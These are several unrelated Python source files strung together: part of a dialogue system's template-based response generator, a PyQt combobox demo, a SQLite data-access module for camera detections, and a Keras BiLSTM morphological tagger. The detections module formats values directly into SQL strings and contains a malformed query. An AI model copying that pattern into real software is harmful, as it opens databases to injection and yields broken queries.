react_cands.append((rule_info, match_dict, response_str, selection.priority, selection.topic_anchor))\n elif selection.template_type == '_present':\n present_cands.append((rule_info, match_dict, response_str, selection.priority, selection.topic_anchor))\n elif selection.template_type == '_rpresent':\n rpresent_cands.append((rule_info, match_dict, response_str, selection.priority, selection.topic_anchor))\n\n rp_predicates, rp_string, rp_score, rp_anchor, rp_id = None, None, None, None, None\n if len(rpresent_cands) > 0:\n print('\\nReact + Present Options: ')\n rp_predicates, rp_string, rp_score, rp_anchor, rp_id = self.select_best_candidate(rpresent_cands, cg, answer_checks)\n\n p_predicates, p_string, p_score, p_anchor, p_id = None, None, None, None, None\n if len(present_cands) > 0:\n print('\\nPresent Options: ')\n p_predicates, p_string, p_score, p_anchor, p_id = self.select_best_candidate(present_cands, cg, answer_checks)\n\n r_predicates, r_string, r_score, r_anchor, r_id = None, None, None, None, None\n curr_turn = aux_state.get('turn_index', 0)\n if len(react_cands) > 0:\n print('React Options: ')\n r_predicates, r_string, r_score, r_anchor, r_id = self.select_best_candidate(react_cands, cg, answer_checks, check_aware=False)\n\n if rp_score is not None and (p_score is None or rp_score >= p_score):\n string = rp_string\n predicates = rp_predicates\n anchor = rp_anchor\n aux_state.setdefault('responses', {})[rp_id[0]] = (rp_id[1], 
rp_string)\n aux_state.setdefault('all_resp', set()).add(rp_string)\n else:\n if p_string is None:\n string, predicates, anchor = (p_string, p_predicates, p_anchor)\n else:\n string = p_string\n anchor = p_anchor\n aux_state.setdefault('responses', {})[p_id[0]] = (p_id[1], p_string)\n aux_state.setdefault('all_resp', set()).add(p_string)\n predicates = p_predicates\n if curr_turn > 0:\n s = random.choice(['Yeah .', 'Gotcha .', 'I see .', 'Okay .'])\n else:\n s = ''\n if r_string is not None:\n aux_state.setdefault('responses', {})[r_id[0]] = (r_id[1], r_string)\n aux_state.setdefault('all_resp', set()).add(r_string)\n s = r_string\n # Do not add reaction predicates to predicates list in order to avoid them being treated as spoken and getting the eturn predicate\n string = s + ' ' + string\n\n type = \"template\"\n if string is None: # PICK UNUSED FALLBACK\n # can still use reaction even with fallback\n string = ''\n candidates = list(set(fallback_options.keys()) - set(aux_state.get('fallbacks', [])))\n # candidates = ['ai', 'pet', 'sport', 'movie', 'postpandemicnlg',\n # 'art', 'reading', 'tech', 'food', 'videogame', 'travel', 'phone']\n if len(candidates) > 0:\n selected = random.choice(candidates)\n # selected = candidates[len(aux_state.get('fallbacks', []))] + '_fallback'\n if 'fallbacks' not in aux_state:\n aux_state['fallbacks'] = []\n if selected not in aux_state['fallbacks']:\n aux_state['fallbacks'].append(selected)\n predicates, template_d, _ = fallback_options[selected]\n template_obj = list(template_d.values())[0]\n string = ' '.join(template_obj.string_spec_ls)\n aux_state.setdefault('all_resp', set()).add(string)\n if r_string is not None:\n aux_state.setdefault('responses', {})[r_id[0]] = (r_id[1], r_string)\n string = r_string + ' ' + string\n type = \"fallback\"\n anchor = template_obj.topic_anchor\n else:\n string = None\n predicates = None\n anchor = None\n\n if string is not None:\n string = string.replace(\"’\", \"'\")\n\n return (string, predicates, [(anchor, '_tanchor')], type)\n\n def _get_candidates(self, post, aux_state, rule):\n candidates = list(post.keys())\n if len(candidates) > 1:\n prev = aux_state.get('responses', {}).get(rule, None)\n if prev is not None:\n previous_form, previous_str = prev\n candidates.remove(previous_form)\n return candidates\n\n def _fill_template(self, rule, post, match_dict, expr_dict, cg):\n string_spec_ls = list(post.string_spec_ls) # need to create copy so as to not mutate the postcondition in the rule\n try:\n return self.fill_string(match_dict, expr_dict, string_spec_ls, cg)\n except Exception as e:\n print('Error in NLG template filling of %s for rule %s => %s' % (string_spec_ls, rule, e))\n return None\n\n def select_best_candidate(self, responses, cg, answer_checks, check_aware=True):\n # get highest salience candidate with at least one uncovered predicate\n # prefer answers to unanswered user requests above all else\n candidates = []\n answer_candidates = []\n\n for rule_info, match_dict, string, priority, topic_anchor in responses:\n rule, selection = rule_info\n # check if template that gives answer to user request\n for req, req_concepts in answer_checks.items():\n if req_concepts.issubset(set(match_dict.values())):\n answer_candidates.append(rule)\n preds = [cg.predicate(x) for x in match_dict.values() if cg.has(predicate_id=x)\n and cg.type(x) not in {EXPR, TYPE}]\n if check_aware and rule not in SPECIAL_NOT_CHECK_AWARE:\n req_pred = [cg.predicate(x) for x in match_dict.values() if cg.has(predicate_id=x)\n and cg.type(x) 
in {REQ_ARG, REQ_TRUTH} and cg.subject(x) == 'emora'] # check if emora already asked question\n user_awareness = [cg.has(x[3], USER_AWARE) for x in preds]\n user_req_awareness = [cg.has(x[3], USER_AWARE) for x in req_pred]\n if not check_aware or rule in SPECIAL_NOT_CHECK_AWARE or (False in user_awareness and (not user_req_awareness or False in user_req_awareness)):\n # at least one predicate is not known by the user\n # and all request predicates are not known by user, if there are requests in response\n # todo - stress test emora not asking a question she already has answer to or has asked before\n # this should work, but we do have req_unsat predicate as backup, if needed\n concepts = list(match_dict.values())\n sals = [cg.features.get(x, {}).get(SALIENCE, 0) for x in concepts]\n sal_avg = sum(sals) / len(sals)\n # GET COHERENCE BY TOPIC ANCHOR SALIENCE\n coh = cg.features.get(topic_anchor, {}).get(SALIENCE, 0)\n final_score = SAL_WEIGHT * sal_avg + PRIORITY_WEIGHT * priority + COH_WEIGHT * coh\n candidates.append((preds, string, final_score, topic_anchor, rule_info))\n print('\\t%s (sal: %.2f, coh: %.2f, pri: %.2f)' % (string, sal_avg, coh, priority))\n print()\n if len(answer_candidates) > 0:\n with_scores = [x for x in candidates if x[4][0] in answer_candidates]\n if len(with_scores) > 0:\n return max(with_scores, key=lambda x: x[2])\n if len(candidates) > 0:\n return max(candidates, key=lambda x: x[2])\n return None, None, None, None, None\n\n # todo - add in profanity check\n def fill_string(self, match_dict, expr_dict, string_spec_ls, cg):\n # initialize realizations for variables used in string_spec_ls dependencies\n specifications = {}\n realizations = {}\n for e in string_spec_ls:\n if isinstance(e, (list,tuple)):\n for k,v in e[1].items():\n if v in match_dict:\n np, np_realized = self._process_variable_match(match_dict[v], cg, expr_dict)\n if np is not None:\n specifications[v] = np\n realizations[v] = np_realized\n with_params = [(i,e) for i,e in enumerate(string_spec_ls) if isinstance(e, (list,tuple))]\n without_params = [(i,e) for i,e in enumerate(string_spec_ls) if not isinstance(e, (list,tuple))]\n\n # Replacement of constants and parameter-less variables\n for i, e in without_params:\n if '.var' in e:\n e = e[:-4]\n string_spec_ls[i] = e\n if e not in realizations:\n match = match_dict[e]\n np, np_realized = self._process_variable_match(match, cg, expr_dict)\n if np is not None:\n specifications[e] = np\n realizations[e] = np_realized\n else:\n if e not in realizations:\n realizations[e] = e\n\n with_params_dependent = []\n with_params_independent = []\n for i, e in with_params:\n for val in e[1].values():\n if val in match_dict:\n with_params_dependent.append((i,e))\n break\n else:\n with_params_independent.append((i,e))\n\n # Replacement of independent variables\n for i, e in with_params_independent:\n surface_form, spec = e\n e_id = str(e)\n if e_id not in realizations:\n if '.var' in surface_form:\n surface_form = surface_form[:-4]\n surface_form = match_dict[surface_form]\n if \"p\" in spec or \"d\" in spec: # noun\n np = self.nlgFactory.createNounPhrase()\n if surface_form in expr_dict: # the matched concept for the variable is a named concept\n noun = self.nlgFactory.createNLGElement(expr_dict[surface_form], LexicalCategory.NOUN)\n else: # not a named concept\n noun = self._unnamed_noun(cg, surface_form)\n np.setNoun(noun)\n if spec.get(\"d\", False) == True: # set determiner\n if cg.metagraph.out_edges(surface_form, REF) or list(cg.predicates(surface_form, 
USER_AWARE)): # reference\n np.setDeterminer('the')\n else: # instance\n np.setDeterminer('a')\n if spec.get(\"p\", False) == True: # set as possessive\n np.setFeature(Feature.POSSESSIVE, True)\n np.setFeature(Feature.PRONOMINAL, True) # todo - is this supposed to be here?\n realizations[e_id] = self.realiser.realiseSentence(np)[:-1]\n specifications[e_id] = np\n else: # verb\n clause = self.nlgFactory.createClause()\n to_remove = set()\n if 't' in spec:\n clause.setVerb(surface_form)\n tense = match_dict.get(spec['t'], spec['t'])\n tense = expr_dict.get(tense, tense)\n if tense == 'past':\n clause.setFeature(Feature.TENSE, Tense.PAST)\n elif tense in {'present', 'now'}:\n clause.setFeature(Feature.TENSE, Tense.PRESENT)\n elif tense == 'future':\n clause.setFeature(Feature.TENSE, Tense.FUTURE)\n else:\n print(\n 'WARNING! You specified an nlg `tense` parameter that is not handled (%s).' % spec['t'])\n if 's' in spec:\n subject = realizations.get(spec['s'], spec['s'])\n clause.setSubject(subject)\n if spec['s'] in specifications:\n clause.setFeature(Feature.NUMBER, specifications[spec['s']].features['number'])\n to_remove.add(subject)\n sentence = self.realiser.realiseSentence(clause).lower()\n for r in to_remove:\n pattern = r'\\b' + r.lower() + r'\\b'\n sentence = re.sub(pattern, '', sentence)\n realizations[e_id] = sentence[:-1].strip()\n\n # Replacement of dependent variables (only verbs can be dependent and `p` and `d` markers are not relevant for verbs)\n for i, e in with_params_dependent:\n surface_form, spec = e\n e_id = str(e)\n if e_id not in realizations:\n if '.var' in surface_form:\n surface_form = surface_form[:-4]\n surface_form = match_dict[surface_form]\n clause = self.nlgFactory.createClause()\n to_remove = set()\n if 't' in spec:\n clause.setVerb(surface_form)\n tense = match_dict.get(spec['t'], spec['t'])\n tense = expr_dict.get(tense, tense)\n if tense == 'past':\n clause.setFeature(Feature.TENSE, Tense.PAST)\n elif tense in {'present', 'now'}:\n clause.setFeature(Feature.TENSE, Tense.PRESENT)\n elif tense == 'future':\n clause.setFeature(Feature.TENSE, Tense.FUTURE)\n else:\n print('WARNING! You specified an nlg `tense` parameter that is not handled (%s).'%spec['t'])\n if 's' in spec:\n subject = realizations.get(spec['s'], spec['s'])\n clause.setSubject(subject)\n if spec['s'] in specifications:\n clause.setFeature(Feature.NUMBER, specifications[spec['s']].features['number'])\n to_remove.add(subject)\n sentence = self.realiser.realiseSentence(clause).lower()\n for r in to_remove:\n pattern = r'\\b' + r.lower() + r'\\b'\n sentence = re.sub(pattern, '', sentence)\n realizations[e_id] = sentence[:-1].strip()\n\n final_str = [realizations[str(e)] for e in string_spec_ls]\n return ' '.join(final_str)\n\n def _concrete_type(self, cg, concept):\n \"\"\"\n Identify which immediate type of a concept is the most concrete (e.g. 
is lowest in\n the ontology hierarchy)\n \"\"\"\n namespace = cg.id_map().namespace\n immediate_types = cg.objects(concept, TYPE)\n candidates = set()\n for t in immediate_types:\n expressable_subs = {x for x in cg.subtypes_of(t) if x != t and not x.startswith(namespace)}\n intersection = immediate_types.intersection(expressable_subs)\n if len(intersection) == 0 and t not in {GROUP, 'prp', 'propds'} and not t.startswith(namespace) and '_ner' not in t:\n # there are no subtypes in the immediate types and it is not an unexpressable type\n candidates.add(t)\n return next(iter(candidates))\n\n def _process_variable_match(self, match, cg, expr_dict):\n if match in expr_dict: # the matched concept for the variable is a named concept\n return None, expr_dict[match]\n else: # not a named concept\n np = self.nlgFactory.createNounPhrase()\n noun = self._unnamed_noun(cg, match, expr_dict)\n np.setNoun(noun)\n return np, self.realiser.realiseSentence(np)[:-1]\n\n\n def _unnamed_noun(self, cg, match, expr_dict):\n # need to get main type\n match_types = cg.types(match)\n main_type = self._concrete_type(cg, match)\n main_type = expr_dict.get(main_type, main_type)\n noun = self.nlgFactory.createNLGElement(main_type, LexicalCategory.NOUN)\n # whether group\n if GROUP in match_types:\n noun.setFeature(Feature.NUMBER, NumberAgreement.PLURAL)\n else:\n noun.setFeature(Feature.NUMBER, NumberAgreement.SINGULAR)\n return noun\n\nclass Template:\n\n def __init__(self, string_spec_ls, priority, template_type, repetition_type, topic_anchor):\n self.string_spec_ls = string_spec_ls\n self.priority = priority\n self.template_type = template_type\n self.repetition_type = repetition_type\n self.topic_anchor = topic_anchor\n\n def save(self):\n return (self.string_spec_ls, self.priority, self.template_type, self.repetition_type, self.topic_anchor)\n\n def load(self, d):\n self.string_spec_ls = d[0]\n self.priority = d[1]\n self.template_type = d[2]\n self.repetition_type = d[3]\n self.topic_anchor = d[4]\n\n\nif __name__ == '__main__':\n from GRIDD.modules.responsegen_by_templates_spec import ResponseTemplatesSpec\n print(ResponseTemplatesSpec.verify(ResponseTemplateFiller))\n\n # from os.path import join\n # from GRIDD.data_structures.inference_engine import InferenceEngine\n #\n # tfind = ResponseTemplateFinder(join('GRIDD', 'resources', KB_FOLDERNAME, 'nlg_templates'))\n # infer = InferenceEngine()\n #\n # logic = '''\n # '''\n # cg = ConceptGraph(namespace='wm')\n # ConceptGraph.construct(cg, logic)\n #\n # tfill = ResponseTemplateFiller()\n # tfill.test()\n\n\n","repo_name":"emora-chat/GRIDD","sub_path":"modules/responsegen_by_templates.py","file_name":"responsegen_by_templates.py","file_ext":"py","file_size_in_byte":22286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25724489806","text":"# PyQt combobox\n\n# Example : QComboBox\n\nimport sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\nclass ComboBox(QWidget): # ComboBox child class inheriting from QWidget\n def __init__(self,parent = None): # child class constructor\n super(ComboBox,self).__init__(parent) # calling parent class constructor\n\n self.Hbox = QHBoxLayout() # initializing QHBoxLayout (horizontal box)\n self.cb = QComboBox() # initializing QComboBox\n self.cb.addItem('c') # adding item in combobox\n self.cb.addItem('C++')\n self.cb.addItem('Python')\n self.cb.addItem('Java')\n self.cb.currentIndexChanged.connect(self.selectionchange) # index value of choosed item\n\n 
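# --- Illustrative aside (editor's sketch, not part of the original record) ---
# The four addItem() calls above can be collapsed into a single addItems()
# call, and the slot wired to currentIndexChanged receives the new index as
# an int. A minimal sketch assuming PyQt5 (needs a running QApplication);
# the function and variable names below are placeholders:
def _combo_sketch() -> None:
    combo = QComboBox()
    combo.addItems(['c', 'C++', 'Python', 'Java'])  # add all items at once
    combo.currentIndexChanged.connect(
        lambda i: print(combo.itemText(i)))         # i is the new index
# --- end aside ---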
self.Hbox.addWidget(self.cb) # adding combobox to Hbox\n self.setLayout(self.Hbox) # setting Hbox on a window\n self.setWindowTitle('PyQt ComboBox') # window title\n self.setGeometry(200,200,340,200) # window position and size\n\n def selectionchange(self,i): # function taking index value coming from 'currentIndexChanged' as a argument\n print('Item in the list are:') # simple print statement\n\n for count in range(self.cb.count()): # loop for counting the combobox items\n print(self.cb.itemText(count)) # printing box item\n \n print('Current index',i,'selection changed',self.cb.currentText()) # print statement with index value and selected item from the box\n\ndef main(): # function main\n app = QApplication(sys.argv) # initializing PyQt\n ComboBox_obj = ComboBox() # class object\n ComboBox_obj.show() # calling show () function using class object\n sys.exit(app.exec_()) # exit window\n\nif __name__ == \"__main__\":\n main() # main function call","repo_name":"ankit-0044/Python","sub_path":"Python Gui/07.01_QComboBox.py","file_name":"07.01_QComboBox.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17733516629","text":"import uuid\nimport settings\n\nfrom dao_utils import execute_query\nfrom images_dao import table_name as images_table_name\nfrom images_dao import time_column as images_time_column\nfrom images_dao import filename_column as images_filename_column\n\ntable_name = 'detections'\nimage_column = 'image'\nid_column = 'id'\nobject_type_column = 'object_type'\nbounding_box_column = 'boundingbox'\ncolumns = [id_column, image_column, object_type_column, bounding_box_column]\n\n\ndef save_or_update(filename, object_type, bounding_box=None):\n new_id = uuid.uuid4()\n query = 'INSERT INTO {} VALUES (\"{}\", \"{}\", \"{}\", \"{}\")' \\\n .format(table_name, new_id, filename, object_type, bounding_box)\n execute_query(settings.database, query)\n return new_id\n\n\ndef get_all_detections(max_results=5):\n query = 'SELECT * FROM {} DESC LIMIT {}'.format(table_name, max_results)\n results = execute_query(settings.database, query)\n return results\n\n\ndef get_last_detections(max_results=5):\n query = 'SELECT * FROM {} INNER JOIN {} ON {}.image={}.filename ORDER BY {} DESC LIMIT {}' \\\n .format(table_name, images_table_name, table_name, images_table_name, images_time_column, max_results)\n results = execute_query(settings.database, query)\n return results\n\n\ndef setup():\n create_table()\n\n\ndef create_table():\n \"\"\"Create a table\"\"\"\n foreign_key_query = 'FOREIGN KEY(%s) REFERENCES %s(%s)' % (image_column, images_table_name, images_filename_column)\n query = \"CREATE TABLE %s (%s VARCHAR(32) PRIMARY KEY, %s VARCHAR(32), %s VARCHAR(64), %s VARCHAR(32), %s)\" % (\n table_name, id_column, image_column, object_type_column, bounding_box_column, foreign_key_query)\n execute_query(settings.database, query)\n","repo_name":"cmeijer/camera","sub_path":"detections_dao.py","file_name":"detections_dao.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20660306470","text":"# -*- coding: utf-8 -*-\n# Автор: Гусев Илья\n# Описание: Модель PoS-теггера на основе BiLSTM.\n\nfrom typing import List, Tuple\nimport os\n\nimport numpy as np\nfrom pymorphy2 import MorphAnalyzer\nfrom russian_tagsets import converters\nfrom keras.layers import Input, Embedding, Dense, LSTM, BatchNormalization, 
Activation, \\\n concatenate, Bidirectional, TimeDistributed, Dropout\nfrom keras.models import Model, model_from_json\ntry:\n from keras.optimizers import Adam\nexcept:\n from keras.optimizer_v2.adam import Adam\nfrom keras import backend as K\n\nfrom rnnmorph.batch_generator import BatchGenerator\nfrom rnnmorph.data_preparation.grammeme_vectorizer import GrammemeVectorizer\nfrom rnnmorph.data_preparation.word_vocabulary import WordVocabulary\nfrom rnnmorph.data_preparation.loader import Loader\nfrom rnnmorph.char_embeddings_model import build_dense_chars_layer, get_char_model\nfrom rnnmorph.config import BuildModelConfig, TrainConfig\n\n\nclass ReversedLSTM(LSTM):\n def __init__(self, units, **kwargs):\n kwargs['go_backwards'] = True\n super().__init__(units, **kwargs)\n\n def call(self, inputs, **kwargs):\n y_rev = super().call(inputs, **kwargs)\n return K.reverse(y_rev, 1)\n\n\nclass LSTMMorphoAnalysis:\n def __init__(self, language: str):\n self.language = language # type: str\n self.morph = MorphAnalyzer() if language == \"ru\" else None # type: MorphAnalyzer\n self.converter = converters.converter('opencorpora-int', 'ud14') if self.language == \"ru\" else None\n self.grammeme_vectorizer_input = GrammemeVectorizer() # type: GrammemeVectorizer\n self.grammeme_vectorizer_output = GrammemeVectorizer() # type: GrammemeVectorizer\n self.word_vocabulary = WordVocabulary() # type: WordVocabulary\n self.char_set = \"\" # type: str\n self.train_model = None # type: Model\n self.eval_model = None # type: Model\n\n def prepare(self, gram_dump_path_input: str, gram_dump_path_output: str,\n word_vocabulary_dump_path: str, char_set_dump_path: str,\n file_names: List[str] = None) -> None:\n \"\"\"\n Подготовка векторизатора грамматических значений и словаря слов по корпусу.\n \"\"\"\n if os.path.exists(gram_dump_path_input):\n self.grammeme_vectorizer_input.load(gram_dump_path_input)\n if os.path.exists(gram_dump_path_output):\n self.grammeme_vectorizer_output.load(gram_dump_path_output)\n if os.path.exists(word_vocabulary_dump_path):\n self.word_vocabulary.load(word_vocabulary_dump_path)\n if os.path.exists(char_set_dump_path):\n with open(char_set_dump_path, 'r', encoding='utf-8') as f:\n self.char_set = f.read().rstrip()\n if self.grammeme_vectorizer_input.is_empty() or \\\n self.grammeme_vectorizer_output.is_empty() or \\\n self.word_vocabulary.is_empty() or\\\n not self.char_set:\n loader = Loader(self.language)\n loader.parse_corpora(file_names)\n\n self.grammeme_vectorizer_input = loader.grammeme_vectorizer_input\n self.grammeme_vectorizer_input.save(gram_dump_path_input)\n self.grammeme_vectorizer_output = loader.grammeme_vectorizer_output\n self.grammeme_vectorizer_output.save(gram_dump_path_output)\n self.word_vocabulary = loader.word_vocabulary\n self.word_vocabulary.save(word_vocabulary_dump_path)\n self.char_set = loader.char_set\n with open(char_set_dump_path, 'w', encoding='utf-8') as f:\n f.write(self.char_set)\n\n def save(self, model_config_path: str, model_weights_path: str,\n eval_model_config_path: str, eval_model_weights_path: str):\n if self.eval_model is not None:\n with open(eval_model_config_path, \"w\", encoding='utf-8') as f:\n f.write(self.eval_model.to_json())\n self.eval_model.save_weights(eval_model_weights_path)\n if self.train_model is not None:\n with open(model_config_path, \"w\", encoding='utf-8') as f:\n f.write(self.train_model.to_json())\n self.train_model.save_weights(model_weights_path)\n\n def load_train(self, config: BuildModelConfig, model_config_path: 
str=None, model_weights_path: str=None):\n with open(model_config_path, \"r\", encoding='utf-8') as f:\n if config.use_crf:\n from keras_contrib.layers import CRF\n custom_objects = {'ReversedLSTM': ReversedLSTM, 'CRF': CRF}\n self.train_model = model_from_json(f.read(), custom_objects=custom_objects)\n else:\n custom_objects = {'ReversedLSTM': ReversedLSTM}\n self.train_model = model_from_json(f.read(), custom_objects=custom_objects)\n self.train_model.load_weights(model_weights_path)\n\n loss = {}\n metrics = {}\n if config.use_crf:\n out_layer_name = 'crf'\n offset = 0\n if config.use_pos_lm:\n offset += 2\n if config.use_word_lm:\n offset += 2\n loss[out_layer_name] = self.train_model.layers[-1-offset].loss_function\n metrics[out_layer_name] = self.train_model.layers[-1-offset].accuracy\n else:\n out_layer_name = 'main_pred'\n loss[out_layer_name] = 'sparse_categorical_crossentropy'\n metrics[out_layer_name] = 'accuracy'\n\n if config.use_pos_lm:\n prev_layer_name = 'shifted_pred_prev'\n next_layer_name = 'shifted_pred_next'\n loss[prev_layer_name] = loss[next_layer_name] = 'sparse_categorical_crossentropy'\n metrics[prev_layer_name] = metrics[next_layer_name] = 'accuracy'\n self.train_model.compile(Adam(clipnorm=5.), loss=loss, metrics=metrics)\n\n self.eval_model = Model(inputs=self.train_model.inputs, outputs=self.train_model.outputs[0])\n\n def load_eval(self, config: BuildModelConfig, eval_model_config_path: str,\n eval_model_weights_path: str) -> None:\n with open(eval_model_config_path, \"r\", encoding='utf-8') as f:\n if config.use_crf:\n from keras_contrib.layers import CRF\n custom_objects = {'ReversedLSTM': ReversedLSTM, 'CRF': CRF}\n self.eval_model = model_from_json(f.read(), custom_objects=custom_objects)\n else:\n custom_objects = {'ReversedLSTM': ReversedLSTM}\n self.eval_model = model_from_json(f.read(), custom_objects=custom_objects)\n self.eval_model.load_weights(eval_model_weights_path)\n \n def build(self, config: BuildModelConfig, word_embeddings=None):\n \"\"\"\n Описание модели.\n\n :param config: конфиг модели.\n :param word_embeddings: матрица словных эмбеддингов.\n \"\"\"\n inputs = []\n embeddings = []\n\n if config.use_word_embeddings and word_embeddings is not None:\n words = Input(shape=(None,), name='words')\n word_vocabulary_size = word_embeddings.size.shape[0]\n word_embeddings_dim = word_embeddings.size.shape[1]\n words_embedding = Embedding(word_vocabulary_size, word_embeddings_dim, name='word_embeddings')(words)\n embeddings.append(words_embedding)\n\n if config.use_gram:\n grammemes_input = Input(shape=(None, self.grammeme_vectorizer_input.grammemes_count()), name='grammemes')\n grammemes_embedding = Dropout(config.gram_dropout)(grammemes_input)\n grammemes_embedding = Dense(config.gram_hidden_size, activation='relu')(grammemes_embedding)\n inputs.append(grammemes_input)\n embeddings.append(grammemes_embedding)\n\n if config.use_chars:\n chars_input = Input(shape=(None, config.char_max_word_length), name='chars')\n\n char_layer = build_dense_chars_layer(\n max_word_length=config.char_max_word_length,\n char_vocab_size=len(self.char_set)+1,\n char_emb_dim=config.char_embedding_dim,\n hidden_dim=config.char_function_hidden_size,\n output_dim=config.char_function_output_size,\n dropout=config.char_dropout)\n if config.use_trained_char_embeddings:\n char_layer = get_char_model(\n char_layer=char_layer,\n max_word_length=config.char_max_word_length,\n embeddings=word_embeddings,\n model_config_path=config.char_model_config_path,\n 
model_weights_path=config.char_model_weights_path,\n vocabulary=self.word_vocabulary,\n char_set=self.char_set)\n chars_embedding = char_layer(chars_input)\n inputs.append(chars_input)\n embeddings.append(chars_embedding)\n\n if len(embeddings) > 1:\n layer = concatenate(embeddings, name=\"LSTM_input\")\n else:\n layer = embeddings[0]\n\n lstm_input = Dense(config.rnn_input_size, activation='relu')(layer)\n lstm_forward_1 = LSTM(config.rnn_hidden_size, dropout=config.rnn_dropout,\n recurrent_dropout=config.rnn_dropout, return_sequences=True,\n name='LSTM_1_forward')(lstm_input)\n\n lstm_backward_1 = ReversedLSTM(config.rnn_hidden_size, dropout=config.rnn_dropout,\n recurrent_dropout=config.rnn_dropout, return_sequences=True,\n name='LSTM_1_backward')(lstm_input)\n layer = concatenate([lstm_forward_1, lstm_backward_1], name=\"BiLSTM_input\")\n\n for i in range(config.rnn_n_layers-1):\n layer = Bidirectional(LSTM(\n config.rnn_hidden_size,\n dropout=config.rnn_dropout,\n recurrent_dropout=config.rnn_dropout,\n return_sequences=True,\n name='LSTM_'+str(i)))(layer)\n\n layer = TimeDistributed(Dense(config.dense_size))(layer)\n layer = TimeDistributed(Dropout(config.dense_dropout))(layer)\n layer = TimeDistributed(BatchNormalization())(layer)\n layer = TimeDistributed(Activation('relu'))(layer)\n\n outputs = []\n loss = {}\n metrics = {}\n num_of_classes = self.grammeme_vectorizer_output.size() + 1\n\n if config.use_crf:\n from keras_contrib.layers import CRF\n out_layer_name = 'crf'\n crf_layer = CRF(num_of_classes, sparse_target=True, name=out_layer_name)\n outputs.append(crf_layer(layer))\n loss[out_layer_name] = crf_layer.loss_function\n metrics[out_layer_name] = crf_layer.accuracy\n else:\n out_layer_name = 'main_pred'\n outputs.append(Dense(num_of_classes, activation='softmax', name=out_layer_name)(layer))\n loss[out_layer_name] = 'sparse_categorical_crossentropy'\n metrics[out_layer_name] = 'accuracy'\n\n if config.use_pos_lm:\n prev_layer_name = 'shifted_pred_prev'\n next_layer_name = 'shifted_pred_next'\n prev_layer = Dense(num_of_classes, activation='softmax', name=prev_layer_name)\n next_layer = Dense(num_of_classes, activation='softmax', name=next_layer_name)\n outputs.append(prev_layer(Dense(config.dense_size, activation='relu')(lstm_backward_1)))\n outputs.append(next_layer(Dense(config.dense_size, activation='relu')(lstm_forward_1)))\n loss[prev_layer_name] = loss[next_layer_name] = 'sparse_categorical_crossentropy'\n metrics[prev_layer_name] = metrics[next_layer_name] = 'accuracy'\n\n if config.use_word_lm:\n out_layer_name = 'out_embedding'\n out_embedding = Dense(word_embeddings.shape[0],\n weights=[word_embeddings.T, np.zeros(word_embeddings.shape[0])],\n activation='softmax', name=out_layer_name, trainable=False)\n outputs.append(out_embedding(Dense(word_embeddings.shape[1], activation='relu')(lstm_backward_1)))\n outputs.append(out_embedding(Dense(word_embeddings.shape[1], activation='relu')(lstm_forward_1)))\n loss[out_layer_name] = 'sparse_categorical_crossentropy'\n metrics[out_layer_name] = 'accuracy'\n\n self.train_model = Model(inputs=inputs, outputs=outputs)\n self.train_model.compile(Adam(clipnorm=5.), loss=loss, metrics=metrics)\n self.eval_model = Model(inputs=inputs, outputs=outputs[0])\n print(self.train_model.summary())\n\n def train(self, file_names: List[str], train_config: TrainConfig, build_config: BuildModelConfig) -> None:\n np.random.seed(train_config.random_seed)\n sample_counter = self.count_samples(file_names)\n train_idx, val_idx = 
self.get_split(sample_counter, train_config.val_part)\n for big_epoch in range(train_config.epochs_num):\n print('------------Big Epoch {}------------'.format(big_epoch))\n batch_generator = BatchGenerator(\n language=self.language,\n file_names=file_names,\n config=train_config,\n grammeme_vectorizer_input=self.grammeme_vectorizer_input,\n grammeme_vectorizer_output=self.grammeme_vectorizer_output,\n build_config=build_config,\n indices=train_idx,\n word_vocabulary=self.word_vocabulary,\n char_set=self.char_set)\n for epoch, (inputs, target) in enumerate(batch_generator):\n self.train_model.fit(inputs, target, batch_size=train_config.batch_size, epochs=1, verbose=2)\n if epoch != 0 and epoch % train_config.dump_model_freq == 0:\n self.save(train_config.train_model_config_path, train_config.train_model_weights_path,\n train_config.eval_model_config_path, train_config.eval_model_weights_path)\n self.evaluate(\n file_names=file_names,\n val_idx=val_idx,\n train_config=train_config,\n build_config=build_config)\n\n @staticmethod\n def count_samples(file_names: List[str]):\n \"\"\"\n Считает количество предложений в выборке.\n\n :param file_names: файлы выборки.\n :return: количество предложений.\n \"\"\"\n sample_counter = 0\n for filename in file_names:\n with open(filename, \"r\", encoding='utf-8') as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n sample_counter += 1\n return sample_counter\n\n @staticmethod\n def get_split(sample_counter: int, val_part: float) -> Tuple[np.array, np.array]:\n \"\"\"\n Выдаёт индексы предложений, которые становятся train или val выборкой.\n\n :param sample_counter: количество предложений.\n :param val_part: часть выборки, которая станет val.\n :return: индексы выборок.\n \"\"\"\n perm = np.random.permutation(sample_counter)\n border = int(sample_counter * (1 - val_part))\n train_idx = perm[:border]\n val_idx = perm[border:]\n return train_idx, val_idx\n\n def evaluate(self, file_names, val_idx, train_config: TrainConfig, build_config: BuildModelConfig) -> None:\n \"\"\"\n Оценка на val выборке.\n\n :param file_names: файлы выборки.\n :param val_idx: val индексы.\n :param train_config: конфиг обучения.\n :param build_config: конфиг модели.\n \"\"\"\n word_count = 0\n word_errors = 0\n sentence_count = 0\n sentence_errors = 0\n batch_generator = BatchGenerator(\n language=self.language,\n file_names=file_names,\n config=train_config,\n grammeme_vectorizer_input=self.grammeme_vectorizer_input,\n grammeme_vectorizer_output=self.grammeme_vectorizer_output,\n build_config=build_config,\n indices=val_idx,\n word_vocabulary=self.word_vocabulary,\n char_set=self.char_set)\n for epoch, (inputs, target) in enumerate(batch_generator):\n predicted_y = self.eval_model.predict(inputs, batch_size=train_config.batch_size, verbose=0)\n for i, sentence in enumerate(target[0]):\n sentence_has_errors = False\n count_zero = sum([1 for num in sentence if num == [0]])\n real_sentence_tags = sentence[count_zero:]\n answer = []\n for grammeme_probs in predicted_y[i][count_zero:]:\n num = np.argmax(grammeme_probs)\n answer.append(num)\n for tag, predicted_tag in zip(real_sentence_tags, answer):\n tag = tag[0]\n word_count += 1\n if tag != predicted_tag:\n word_errors += 1\n sentence_has_errors = True\n sentence_count += 1\n if sentence_has_errors:\n sentence_errors += 1\n\n print(\"Word accuracy: 